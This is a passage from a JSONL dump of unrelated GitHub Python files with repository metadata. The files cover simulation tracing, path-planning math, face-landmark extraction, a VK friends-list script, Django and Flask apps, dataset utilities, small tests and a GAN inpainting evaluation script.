s.goal:\n for goal in s.goal[agent]:\n args = \"\".join(f' {a[0]}' for a in s.goal[agent][goal])\n print(f'(goal {agent[0]} ({goal} {args}) 
{i})')\n\n\ndef calc_stats(base, states):\n prev = None\n for state in states[:-1]:\n numGoals = len(state.goal)\n if numGoals in base['goals']:\n base['goals'][numGoals] += 1\n else:\n base['goals'][numGoals] = 1\n if prev:\n if prev.goal == state.goal:\n base['goalsChanged'][False] += 1\n else:\n base['goalsChanged'][True] += 1\n prev = state\n return base\n\ndef print_stats(stats):\n print(\"stats:\")\n print(stats)\n total = 0\n for g in stats['goals']:\n total += stats['goals'][g]\n for g in stats['goals']:\n print(g, float(stats['goals'][g])/total)\n\n\nif __name__ == '__main__':\n print_visuals = True\n stats = { 'goals':{}, 'goalsChanged':{True:0, False:0}}\n all = pickle.load(open('all.pickle', 'rb'))\n for i, cond1 in enumerate(all):\n for j, cond2 in enumerate(cond1):\n for k, cond3 in enumerate(cond2):\n print('')\n print('* Simulations for conditions', i, j, k, '*')\n for c, (states, plans) in enumerate(cond3):\n stats = calc_stats(stats, states)\n if print_visuals:\n print('- Sim run', i, j, k, c, '-')\n print_trace(states, plans)\n else:\n print(f'(in-simulation {i} {j} {k} {c})')\n print_sexpr(states)\n \n print_stats(stats)\n","repo_name":"FandM-CARES/socialSim","sub_path":"print_trace.py","file_name":"print_trace.py","file_ext":"py","file_size_in_byte":4145,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"7292417417","text":"from math import sqrt, cos, sin, tan, atan, pi\n\n\ndef pi_2_pi(angle):\n \"\"\"将角度转为-pi到pi之间\"\"\"\n return (angle + pi) % (2 * pi) - pi\n\n\ndef calc_index(node, c):\n \"\"\"计算节点的哈希值\"\"\"\n ind = (node.gradient_z_ind - c.min_gradient_z) * c.theta_xyw * c.zw * c.yw * c.xw + \\\n (node.theta_xy_ind - c.min_theta_xy) * c.zw * c.yw * c.xw + \\\n (node.zind - c.minz) * c.xw * c.yw + \\\n (node.yind - c.miny) * c.xw + \\\n (node.xind - c.minx)\n\n if ind <= 0:\n print(\"Error(calc_index):\", ind)\n\n return ind\n\n\ndef calc_cost(current, ngoal):\n nx, ny, nz = ngoal.xlist[-1], ngoal.ylist[-1], ngoal.zlist[-1]\n cx, cy, cz = current.xlist[-1], current.ylist[-1], current.zlist[-1]\n return current.cost + abs(nx-cx) + abs(ny-cy) + abs(nz-cz)\n\n\ndef calc_cost_new(current, heuristic):\n cx, cy, cz = current.xlist[-1], current.ylist[-1], current.zlist[-1]\n return current.cost + 0.95*heuristic[round(cx), round(cy)]\n\n\ndef z_y_move(x, y, z, theta_xy, gradient_z, distance, radi): # 直线或者圆探索\n if radi is not None:\n r = radi\n theta = pi_2_pi(distance / r)\n tmp_x = r * sin(theta)\n tmp_y = r - r*cos(theta)\n new_r = sqrt(tmp_x**2 + tmp_y**2)\n theta0 = theta_xy + atan(tmp_y/tmp_x)\n x += new_r * cos(theta0)\n y += new_r * sin(theta0)\n z += distance*gradient_z\n theta_xy += theta\n else:\n x += distance*cos(theta_xy)\n y += distance*sin(theta_xy)\n z += distance*gradient_z\n\n return x, y, z, theta_xy, gradient_z\n\n\ndef spr_move1(x, y, z, theta_xy, gradient_z, distance, len_s, radi): # 直圆缓和曲线\n ls, l = len_s, distance\n r = radi\n # -(79*l**12)/(2043241200*r**6*ls**6)) # 弦长\n c = l*(1-(l**4)/(90*r**2*ls**2)+(l**8)/(22680*r**4*ls**4))\n # -(23*l**12)/(1915538625*r**6*ls**6)) # 弦切角\n theta = (l**2)/(r*ls)*(1/6-(l**4) /\n (2835*r**2*ls**2)-(l**8)/(467775*r**4*ls**4))\n beta = (l**2)/(2*r*ls) # 切线角\n theta0 = theta_xy + theta\n x += c * cos(theta0)\n y += c * sin(theta0)\n z += distance*gradient_z\n theta_xy += beta\n return x, y, z, theta_xy, gradient_z\n\n\ndef spr_move2(x, y, z, theta_xy, gradient_z, distance, len_s, radi=None):\n ls, l = len_s, len_s\n r = radi\n # -(79*l**6)/(2043241200*r**6)) 
# 弦长\n c = l*(1-(l**2)/(90*r**2)+(l**4)/(22680*r**4))\n # -(23*l**6)/(1915538625*r**6)) # 弦切角\n theta = (l)/(r)*(1/6-(l**2)/(2835*r**2)-(l**4)/(467775*r**4))\n beta = (l)/(2*r) # 切线角\n theta0 = theta_xy + (beta-theta)\n x_final = x + c * cos(theta0)\n y_final = y + c * sin(theta0)\n theta_xy_final = pi_2_pi(theta_xy + beta)\n\n ls, l = len_s, len_s - distance\n # -(79*l**12)/(2043241200*r**6*ls**6)) # 弦长\n c = l*(1-(l**4)/(90*r**2*ls**2)+(l**8)/(22680*r**4*ls**4))\n # -(23*l**12)/(1915538625*r**6*ls**6)) # 弦切角\n theta = (l**2)/(r*ls)*(1/6-(l**4) /\n (2835*r**2*ls**2)-(l**8)/(467775*r**4*ls**4))\n beta = (l**2)/(2*r*ls) # 切线角\n theta0 = theta_xy_final + pi - theta\n x = x_final + c * cos(theta0)\n y = y_final + c * sin(theta0)\n z = z + distance * gradient_z\n theta_xy = theta_xy_final - beta\n\n return x, y, z, theta_xy, gradient_z\n\n\ndef check_collision(xlist, ylist, kdtree):\n for x, y in zip(xlist, ylist):\n cx = x\n cy = y\n\n ids = kdtree.search_in_distance([cx, cy])\n\n if ids:\n return False\n\n return True # no collision\n","repo_name":"zhangtianlong-git/SEA3DCASE2","sub_path":"tool_functions.py","file_name":"tool_functions.py","file_ext":"py","file_size_in_byte":3538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7017415943","text":"n = int(input())\n# 각 변수들 초기화\ncount = 1\nstart = 1\nend = 1\nsumm = 1\n\nwhile end != n :\n if summ == n: # summ이 n일 때 count 증가 후\n count += 1\n summ += end\n elif summ >n: # summ이 n보다 클 때 start 위치를 뒤로 옮겨줌. summ 값 감소\n summ -= start\n start += 1\n else: # summ이 n보다 작을 때 end 위치를 뒤로 옮겨줌. summ값 증가\n end += 1\n summ += end\nprint(count) \n","repo_name":"kjjs2670/Algorithm","sub_path":"2_13/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"5699566113","text":"\"\"\"****************************************************\n#\n# Filename: process_video_and_save_data_average.py\n#\n# Author: endinferno - censhaofeng@buaa.edu.cn\n# Description: This file is used for processing video and extracting features which will be processed by taking average value\n# File Encoding: UTF-8\n# Create: 2019-06-04 19:48:47\n# Last Modified: 2019-06-04 20:08:03\n*****************************************************\"\"\"\n\nimport os\nimport sys\nimport cv2\nimport dlib\n\ncurrent_path = os.getcwd() # 获取当前路径\n# shape_predictor_68_face_landmarks.dat是进行人脸标定的模型,它是基于HOG特征的,这里是他所在的路径\npredictor_path = current_path + \"../../model/shape_predictor_68_face_landmarks.dat\"\nface_directory_path = current_path + \"../../faceimg/\" # 存放人脸图片的路径\n\ndetector = dlib.get_frontal_face_detector() # 获取人脸分类器\npredictor = dlib.shape_predictor(predictor_path) # 获取人脸检测器\n\nvideo_path = sys.argv[1]\n\ncap = cv2.VideoCapture(video_path)\n\nfile_data = open('../../data/data.dat','a')\nfile_data.write(video_path + '\\n')\ncnt = 1\nold_pt = []\n\nwhile True:\n ret, frame = cap.read()\n if ret == True: \n file_data.write(str(cnt)+'\\n')\n dets = detector(frame, 1)\n\n print(\"Number of faces detected: {}\".format(len(dets))) # 打印识别到的人脸个数\n \n for index, face in enumerate(dets):\n print('face {}; left {}; top {}; right {}; bottom {}'.format(index, face.left(), face.top(), face.right(), face.bottom()))\n\n shape = predictor(frame, face) # 寻找人脸的68个标定点 \n for index, pt in enumerate(shape.parts()):\n print('Part {}: {}'.format(index, pt))\n if len(old_pt) == 68:\n pt_pos = ((pt.x + old_pt[index][0]) / 2.0, (pt.y + 
old_pt[index][1]) / 2.0)\n old_pt[index] = (pt.x, pt.y)\n file_data.write(str(index) + ':')\n file_data.write(str(pt_pos))\n else:\n pt_pos = (pt.x, pt.y)\n old_pt.append(pt_pos)\n k = cv2.waitKey(30) & 0xFF\n if k == 27:\n break\n else:\n break\n file_data.write('\\n')\n cnt += 1\nfile_data.close()\n# k = cv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n","repo_name":"endinferno/faceexpression","sub_path":"code/process_video_and_save_data_average.py","file_name":"process_video_and_save_data_average.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"38940092475","text":"import requests\n\n\ndef request_get(method: str, **params):\n \"\"\"Returns dict from response\"\"\"\n useragent = None\n proxy = None\n\n data = {\n 'access_token': os.getenv(\"TOKEN\"),\n 'v': 5.131\n }\n data.update(params)\n\n url = f'https://api.vk.com/method/{method}'\n\n resp_json = requests.get(url, params=data, headers=useragent, proxies=proxy).json()\n\n if 'error' in resp_json:\n return resp_json['error']\n else:\n return resp_json['response']\n\n\ndef get_id_from_url(url: str) -> int:\n return request_get('users.get', user_ids=url.split('/')[-1])[0]['id'] # получение id из ссылки\n\n\ndef get_url_from_id(user_id: int) -> str:\n return f'https://vk.com/id{user_id}'\n\n\ndef get_shadows_friends_ids(target_id: int) -> list:\n \"\"\"Returns list of shadow friends\"\"\"\n\n response = request_get('friends.get', user_id=target_id) # получение списка друзей\n\n if 'error_code' in response:\n return []\n\n results = []\n\n for i in response['items']:\n friends_friend = request_get(\"friends.get\", user_id=i)\n if 'error_code' in friends_friend:\n continue\n friends_friend = friends_friend['items']\n if target_id not in friends_friend:\n results.append(i)\n\n return results\n","repo_name":"TheK4n/GetFriendsWhoHidYouVk","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"21391118902","text":"\"\"\"\n :platform: Unix, OS X\n :synopsis: Django forms for Inventory CRUD\n\n .. 
moduleauthor:: Matthew de Verteuil \n\"\"\"\nfrom django import forms\n\nfrom .models import (Account,\n InventoryItem,\n Purchaser,\n Transaction)\n\n\nclass AccountForm(forms.ModelForm):\n \"\"\"\n Helper for creating and updating :class:`.models.Account`\n \"\"\"\n class Meta:\n model = Account\n\n\nclass InventoryItemForm(forms.ModelForm):\n \"\"\"\n Helper for creating and updating\n :class:`simp.inventory.models.InventoryItem`\n \"\"\"\n class Meta:\n model = InventoryItem\n\n\nclass PurchaserForm(forms.ModelForm):\n \"\"\"\n Helper for creating and updating :class:`.models.Purchaser`\n \"\"\"\n class Meta:\n model = Purchaser\n\n\nclass TransactionForm(forms.ModelForm):\n \"\"\"\n Helper for creating and updating :class:`.models.Transaction`\n \"\"\"\n class Meta:\n model = Transaction\n item = forms.ModelChoiceField(required=True,\n queryset=InventoryItem.objects.exclude(\n archived=True))\n account = forms.ModelChoiceField(required=True,\n queryset=Account.objects.exclude(\n archived=True))\n purchaser = forms.ModelChoiceField(required=True,\n queryset=Purchaser.objects.exclude(\n archived=True))\n","repo_name":"mverteuil/SIMP","sub_path":"simp/inventory/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"10185154563","text":"import os\nnames = []\nfor root, dirnames, filenames in os.walk('/home/harm/Downloads/imagenet/ILSVRC2013_DET_val'):\n for f in filenames:\n names.append(os.path.join(root, f))\nimport json\na = json.dumps(names)\nf = open ('imagenet_val_index.json', 'w')\nf.write(a)\nf.close()\n","repo_name":"hberntsen/resisting-adversarials","sub_path":"00_ImageNet/imagenet_to_json.py","file_name":"imagenet_to_json.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"1148944305","text":"from django import forms\nfrom .models import Comment, Photo, Tag\nfrom places.models import CountryIndex, Activity, Animal, Park\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Fieldset, ButtonHolder, Submit, Div, HTML\nfrom tags_input.fields import TagsInputField\n\n\nclass CommentForm(forms.ModelForm):\n class Meta:\n model = Comment\n fields = ('user', 'comment')\n\n\nclass PhotoSearchForm(forms.Form):\n country = forms.ModelChoiceField(queryset=CountryIndex.objects.all())\n park = forms.ModelChoiceField(queryset=Park.objects.all())\n animal = forms.ModelChoiceField(queryset=Animal.objects.all().order_by('name'))\n activity = forms.ModelChoiceField(queryset=Activity.objects.all())\n\n\nclass PhotoTagsForm(forms.ModelForm):\n\n country_index = forms.ModelChoiceField(queryset=CountryIndex.objects.all(), required=False, label=\"Where was this picture taken?\")\n park = forms.ModelChoiceField(queryset=Park.objects.all(), required=False, label=\"Park / game reserve?\")\n activity = forms.ModelChoiceField(queryset=Activity.objects.filter(activity_type=\"SAFARI\"), required=False, label=\"What were you doing?\")\n animals = forms.ModelMultipleChoiceField(\n label=\"Any animals in the photo?\",\n required=False,\n widget=forms.SelectMultiple(attrs={'class': \"select2\"}),\n queryset=Animal.objects.all().order_by('name'),\n )\n\n tags = TagsInputField(queryset=Tag.objects.all(), label=\"Additional tags (example: sunset, jeep)\", required=False)\n\n\n class Meta:\n model = Photo\n fields = ('country_index', 'park', 'activity', 
'animals', 'tags')\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n if self.data.get('country_index',''):\n self.fields['park'].queryset = Park.objects.filter(country_indexes__id=self.data['country_index'])\n else:\n if self.instance.country_index:\n self.fields['park'].queryset = Park.objects.filter(country_indexes__id=self.instance.country_index.id)\n else:\n self.fields['park'].queryset = Park.objects.none()\n self.helper = FormHelper()\n self.helper.layout = Layout(\n Div(\n Div(\n Div(\n 'country_index',\n css_class=\"col-12 col-md-6\"\n ),\n Div(\n 'park',\n css_class=\"col-12 col-md-6\"\n ),\n\n css_class=\"row\"\n ),\n Div(\n Div(\n 'activity',\n css_class=\"col-12 col-md-6\"\n ),\n\n css_class=\"row\"\n ),\n Div(\n Div(\n 'animals',\n css_class=\"col-12\"\n ),\n\n css_class=\"row\"\n ),\n Div(\n Div(\n 'tags',\n css_class=\"col-12\"\n ),\n\n css_class=\"row\"\n ),\n css_class=\"container\"\n ),\n ButtonHolder(\n Submit('submit', 'Submit', css_class='button white'),\n HTML('Cancel')\n )\n )\n\n","repo_name":"montenegrop/djangotravelportal","sub_path":"photos/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3852687519","text":"import plotly.figure_factory as ff \nimport plotly.graph_objects as go \nimport statistics \nimport random \nimport pandas as pd\n\ndf = pd.read_csv(\"data.csv\")\ndata = df[\"Math_score\"].tolist()\n\nmean = statistics.mean(data)\nstdev = statistics.stdev(data)\n\nprint(\"The mean is \" , mean)\nprint(\"The standard deviation is \" , stdev)\n\ndef random_mean(): \n sample_data = [] \n for i in range(0,100): \n random_index = random.randint(0,len(data)-1) \n value = data[random_index] \n sample_data.append(value) \n sample_mean = statistics.mean(sample_data) \n #sample_stdDEv = statistics.stdev(sample_data)\n return sample_mean \n\nmean_list=[] \nfor i in range(0,1000): \n all_mean_data = random_mean() \n mean_list.append(all_mean_data) \n final_mean = statistics.mean(mean_list) \n final_stdDev = statistics.stdev(mean_list) \n print(\"sampling mean:- \",final_mean,\"sampling stdDev: \",final_stdDev) \n \nfig = ff.create_distplot([mean_list], [\"Math scores\"], show_hist = False)\nfig.add_trace(go.Scatter(x=[mean, mean], y=[0,0.20], mode = \"lines\", name = \"Mean\"))\nfig.show()\n","repo_name":"DGS252008/Python","sub_path":"Python/Class-111/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20705529279","text":"import os\nimport random\nimport argparse\n\n\ndef w2f(ofn, lst):\n with open(ofn, 'w') as of:\n for x in lst:\n of.write('{} {}\\n'.format(*x))\n\n\ndef gen_train_val_list(folder, ofolder, val_ratio, ext='jpg'):\n train_lst = []\n val_lst = []\n for _, dirs, _ in os.walk(folder):\n for d in dirs:\n lb = int(d)\n fns = os.listdir(os.path.join(folder, d))\n random.shuffle(fns)\n n = int(len(fns) * val_ratio)\n n = max(len(fns) - n, 1)\n train_lst.extend([(os.path.join(d, fn), lb) for fn in fns[:n]])\n val_lst.extend([(os.path.join(d, fn), lb) for fn in fns[n:]])\n w2f(os.path.join(ofolder, 'train.txt'), train_lst)\n w2f(os.path.join(ofolder, 'val.txt'), val_lst)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--folder',\n type=str,\n help=\"image folder\",\n required=True)\n parser.add_argument('--ofolder',\n 
type=str,\n default='./',\n help=\"output folder to save train/val list\")\n parser.add_argument('--val-ratio', type=float, default=0.05)\n parser.add_argument(\"--seed\", type=int, default=42, help=\"random seed\")\n args = parser.parse_args()\n\n random.seed(args.seed)\n\n gen_train_val_list(args.folder, args.ofolder, args.val_ratio)\n","repo_name":"yl-1993/hfsoftmax","sub_path":"tools/split_train_val.py","file_name":"split_train_val.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":96,"dataset":"github-code","pt":"81"} +{"seq_id":"71072735931","text":"from flask import Flask, render_template, request\n\nAPP = Flask(__name__)\n\n\n@APP.route(\"/\")\n@APP.route(\"/scatter\", methods=[\"GET\", \"POST\"])\ndef scatter():\n x_axis = request.values.get(\"x_axis\", \"health\")\n y_axis = request.values.get(\"y_axis\", \"energy\")\n target = request.values.get(\"target\", \"rarity\")\n return render_template(\n \"scatter.html\",\n x_axis=x_axis,\n y_axis=y_axis,\n target=target,\n axis_options=[\"health\", \"energy\", \"sanity\"],\n target_options=[\"type\", \"rarity\", \"level\"],\n )\n\n\n@APP.route(\"/bar\", methods=[\"GET\", \"POST\"])\ndef bar():\n x_axis = request.values.get(\"x_axis\", \"rarity\")\n target = request.values.get(\"target\", \"type\")\n return render_template(\n \"bar.html\",\n x_axis=x_axis,\n target=target,\n x_options=[\"type\", \"rarity\", \"level\"],\n target_options=[\"type\", \"rarity\", \"level\"],\n )\n\n\n@APP.route(\"/pie\", methods=[\"GET\", \"POST\"])\ndef pie():\n target = request.values.get(\"target\", \"rarity\")\n return render_template(\n \"pie.html\",\n target=target,\n target_options=[\"type\", \"rarity\", \"level\"],\n )\n\n\nif __name__ == '__main__':\n APP.run()\n","repo_name":"BrokenShell/VisFromAPI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74757708091","text":"import logging\nimport unittest\nimport numpy as np\nfrom cython_example_proj import array_sum, tessellate, factorial\n\n\"\"\"\nSome basic tests\n\"\"\"\n\nlogging.basicConfig(level=logging.DEBUG)\n\n\nclass TestSTL(unittest.TestCase):\n\n def test_array_sum(self):\n\n A = np.random.randn(500, 500)\n result = array_sum(A)\n self.assertAlmostEqual(A.sum(), result)\n\n def test_tessellate(self):\n\n A = np.random.randn(100, 100)\n result = tessellate(A)\n m, n = result.shape\n assert m == 20000\n assert n == 12\n\n def test_factorial(self):\n assert factorial(10) == 3628800\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"thearn/simple-cython-example","sub_path":"cython_example_proj/test/test_cython_examples.py","file_name":"test_cython_examples.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":124,"dataset":"github-code","pt":"78"} +{"seq_id":"1221611752","text":"\nclass Car(object):\n \"\"\" Random class car\"\"\"\n def __init__(self, speed=0, fuel_tank_capacity=40):\n \"\"\" Initialize default speed, distance and time \"\"\"\n self.speed = speed\n self.odometer = 0\n self.time = 0\n self.fuel_tank_capacity = fuel_tank_capacity\n self.fuel = 20\n\n def say_state(self):\n \"\"\" Print current speed in km/k\"\"\"\n print(f\"I'm going {self.speed} km/h\")\n\n def accelerate(self):\n \"\"\" Add more speed! 
\"\"\"\n self.speed += 5\n\n def brake(self):\n \"\"\" Subtract spedd \"\"\"\n if self.speed < 5:\n self.speed = 0\n else: self.speed -= 5\n\n def step(self):\n while self.fuel > 0:\n self.odometer += self.speed\n self.time += 1\n self.fuel -= 0.25\n\n if self.fuel == 0:\n print(\"You dont have fuel\")\n\n def average_speed(self):\n \"\"\" Calculate avarge speed\"\"\"\n return self.odometer / self.time\n\n def refueling(self):\n \"\"\" refueling to max value \"\"\"\n if self.fuel < self.fuel_tank_capacity:\n self.fuel += (self.fuel_tank_capacity - self.fuel)\n\n else:\n print(\"You dont need to refueling\")\n\n\nif __name__ == '__main__':\n\n my_car = Car()\n\n while True:\n action = input(\"Press: \"\n \"[A}ccelerate, \"\"[B]rake, show [O]dometer, \"\"or show average [S]peed\").upper()\n\n if action not in \"ABOS\" or len(action) != 1:\n print('Invalid input')\n if action == 'A':\n my_car.accelerate()\n elif action == 'B':\n my_car.brake()\n elif action == 'O':\n print(f\"Car has driven {my_car.odometer}\")\n\n elif action == 'S':\n print(f\"Average speed is {my_car.speed()} km/h\")\n\n my_car.step()\n my_car.say_state()\n","repo_name":"BSteposz/Unittest2","sub_path":"Car.py","file_name":"Car.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1043431531","text":"import unittest\nfrom rest_framework.serializers import ValidationError\nfrom snippets.serializers import MyUserSerializer\n\n\nclass MyUserSerializerTestCase(unittest.TestCase):\n\n def test_valid_user_data(self):\n # Datos de ejemplo para un usuario válido\n user_data = {\n \"name\": \"John Doe\",\n \"email\": \"john.doe@example.com\",\n \"age\": 25\n }\n\n serializer = MyUserSerializer(data=user_data)\n self.assertTrue(serializer.is_valid())\n\n def test_invalid_user_data(self):\n # Datos de ejemplo para un usuario inválido (edad menor a 18)\n user_data = {\n \"name\": \"Jane Smith\",\n \"email\": \"jane.smith@example.com\",\n \"age\": 15\n }\n\n serializer = MyUserSerializer(data=user_data)\n self.assertFalse(serializer.is_valid())\n\n with self.assertRaises(ValidationError):\n serializer.is_valid(raise_exception=True)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"FYG-Solutions/curso-api-rest-python-2023-05","sub_path":"Clase 12/tutorial/snippets/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21177387439","text":"lijst = eval(input('Geef een lijst met minimaal 10 strubgs: '))\n\nnieuwelijst = []\nfor woord in lijst:\n if len(woord) >= 4:\n nieuwelijst.append(woord)\n\n print(nieuwelijst)\n\n\n#\"boter\", \"kaas\", \"bier\", \"pizza\", \"thee\", \"drop\", \"koek\", \"cola\", \"boterham\", \"stamppot\"","repo_name":"PieterVerschoor/programming1","sub_path":"python5/python6/pe6_2.py","file_name":"pe6_2.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11223373439","text":"\nfrom django.urls import path, include\n\nurlpatterns = [\n path('news/', include('news.urls')),\n path('admins/', include('admins.urls')),\n path('', include('accounts.urls')),\n path('doctor/', include('doctor.urls')),\n path('doc/', 
include('doc.urls')),\n]\n","repo_name":"samir571/CityHospital","sub_path":"hospital/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27956400018","text":"import numpy as np\nimport tensorflow as tf\nimport cv2\nimport tqdm\nimport os\nimport matplotlib.pyplot as plt\nimport sys\nimport random\nimport pickle\nfrom PIL import Image\nsys.path.append('..')\nfrom network256 import Network\nfrom load import load_test, load\nfrom collections import Counter\n\n\n# Hyperparameters\nIMAGE_SIZE = 256\nLOCAL_SIZE = 64\nBATCH_SIZE = 16\n\n# Get test data\ntest_data = load_test()\nprint(len(test_data))\ntest_data = [x for x in test_data if len(x[1]) == 4]\nprint(len(test_data))\ntest_data = [x for x in test_data if (int(x[1][2]) - int(x[1][0]) > 0 and int(x[1][3]) - int(x[1][1]) > 0)]\nprint(len(test_data))\n\n\n# Load train and test data.\n\n# train_data, test_data = load(\"../../Data/UIdata/npy-Crop/\")\n\n# print(len(train_data))\n# train_data = [x for x in train_data if len(x[1]) == 4]\n# print(len(train_data))\n\n# train_data = [x for x in train_data if (int(x[1][2]) - int(x[1][0]) > 0 and int(x[1][3]) - int(x[1][1]) > 0)]\n# print(len(train_data))\n\n# print(len(test_data))\n# test_data = [x for x in test_data if len(x[1]) == 4]\n# if len(test_data) < BATCH_SIZE:\n# test_data = train_data\n# print(len(test_data))\n\n# test_data = [x for x in test_data if (int(x[1][2]) - int(x[1][0]) > 0 and int(x[1][3]) - int(x[1][1]) > 0)]\n# print(len(test_data))\n\ndef test():\n \n # Setup Tensor\n x = tf.placeholder(tf.float32, [BATCH_SIZE, IMAGE_SIZE, IMAGE_SIZE, 3])\n x_modified = tf.placeholder(tf.float32, [BATCH_SIZE, IMAGE_SIZE, IMAGE_SIZE, 3])\n mask = tf.placeholder(tf.float32, [BATCH_SIZE, IMAGE_SIZE, IMAGE_SIZE, 1])\n local_x = tf.placeholder(tf.float32, [BATCH_SIZE, LOCAL_SIZE, LOCAL_SIZE, 3])\n global_completion = tf.placeholder(tf.float32, [BATCH_SIZE, IMAGE_SIZE, IMAGE_SIZE, 3])\n local_completion = tf.placeholder(tf.float32, [BATCH_SIZE, LOCAL_SIZE, LOCAL_SIZE, 3])\n is_training = tf.placeholder(tf.bool, [])\n\n # Create model\n model = Network(x, x_modified, mask, local_x, global_completion, local_completion, is_training, batch_size=BATCH_SIZE)\n sess = tf.Session()\n init_op = tf.global_variables_initializer()\n sess.run(init_op)\n\n # Load the model\n saver = tf.train.Saver()\n saver.restore(sess, '../backup/history2/latest')\n\n # np.random.shuffle(test_data)\n \n step_num = int(len(test_data) / BATCH_SIZE) # Total amount of batches\n \n test_results = [] # Store results list\n\n cnt = 0 # Test results counter\n for step_index in tqdm.tqdm(range(step_num)):\n # Get test batch. 
(Init as 16)\n test_batch = test_data[step_index * BATCH_SIZE:(step_index + 1) * BATCH_SIZE]\n \n # Get original image and normalised\n x_batch = np.array([i[0] for i in test_batch])\n x_batch = np.array([a / 127.5 - 1 for a in x_batch])\n \n # Get modified image and normalised\n # x_batch_modified = modify_images(test_batch)\n x_batch_modified = np.array([i[0] for i in test_batch])\n x_batch_modified = np.array([a / 127.5 - 1 for a in x_batch_modified])\n \n # Get modified area bounds and masks\n bounds = np.array([i[1] for i in test_batch])\n _, mask_batch = get_points(bounds)\n \n # Get other components bound\n other_bounds = np.array([i[2] for i in test_batch])\n \n # Run the model\n completion = sess.run(model.imitation, feed_dict={x: x_batch, x_modified: x_batch_modified, mask: mask_batch, is_training: False})\n \n # Test results in batch\n for batch_index in range(BATCH_SIZE):\n # print(batch_index)\n cnt += 1\n box = bounds[batch_index]\n x1 = (box[0], box[1])\n x2 = (box[2], box[3])\n \n # Original image\n raw = x_batch[batch_index]\n raw = np.array((raw + 1) * 127.5, dtype=np.uint8)\n cv2.rectangle(raw, x1, x2, (255,0,0), 2)\n cv2.imwrite('./real/{}.jpg'.format(\"{0:06d}\".format(cnt)), raw)\n \n # Modified image\n # masked = raw * (1 - mask_batch[batch_index]) + np.ones_like(raw) * mask_batch[batch_index] * 255\n modified = x_batch_modified[batch_index]\n modified = np.array((modified + 1) * 127.5, dtype=np.uint8)\n cv2.rectangle(modified, x1, x2, (255,0,0), 2)\n cv2.imwrite('./input/{}.jpg'.format(\"{0:06d}\".format(cnt)), modified)\n \n # Model output image\n img = completion[batch_index]\n img = np.array((img + 1) * 127.5, dtype=np.uint8)\n cv2.rectangle(img, x1, x2, (255,0,0), 2)\n cv2.imwrite('./output/{}.jpg'.format(\"{0:06d}\".format(cnt)), img)\n \n # Get original mask\n original_mask = mask_batch[batch_index]\n original_mask = original_mask == 1\n original_mask = np.reshape(original_mask, (256,256))\n mask_num = np.sum(original_mask)\n \n # Get delta mask (abs(input - output))\n in_int = np.array(modified, dtype=int)\n out_int = np.array(img, dtype=int)\n \n delta = in_int - out_int\n delta = abs(delta)\n delta = np.array(delta, dtype=np.uint8)\n #delta = delta[:,:,0] + delta[:,:,1] + delta[:,:,2]\n #delta = delta/3\n \n test_results.append((delta, bounds[batch_index], other_bounds[batch_index]))\n cv2.rectangle(delta, x1, x2, (255,0,0), 2)\n \n vis = np.concatenate((raw, modified), axis=1)\n vis = np.concatenate((vis, img), axis=1)\n vis = np.concatenate((vis, delta), axis=1)\n \n dst = './aggregate/{}.jpg'.format(\"{0:06d}\".format(cnt))\n \n if np.max(delta) > 50:\n cv2.imwrite('./aggregate/{}.jpg'.format(\"{0:06d}\".format(cnt)), vis)\n # output_image([['Input', modified], ['Output', img], ['Ground Truth', raw], ['Mask', delta]], dst, bounds[batch_index])\n\n np.save(\"test_results.npy\", test_results)\n\n\ndef get_points(bounds):\n points = []\n mask = []\n for b in bounds:\n \n b = [int(x) for x in b]\n mid_y = (b[0] + b[2])/2\n mid_x = (b[1] + b[3])/2\n \n x1 = int(mid_x - LOCAL_SIZE/2)\n if x1 < 0:\n x1 = 0\n elif x1 > IMAGE_SIZE - LOCAL_SIZE:\n x1 = IMAGE_SIZE - LOCAL_SIZE\n \n y1 = int(mid_y - LOCAL_SIZE/2)\n if y1 < 0:\n y1 = 0\n elif y1 > IMAGE_SIZE - 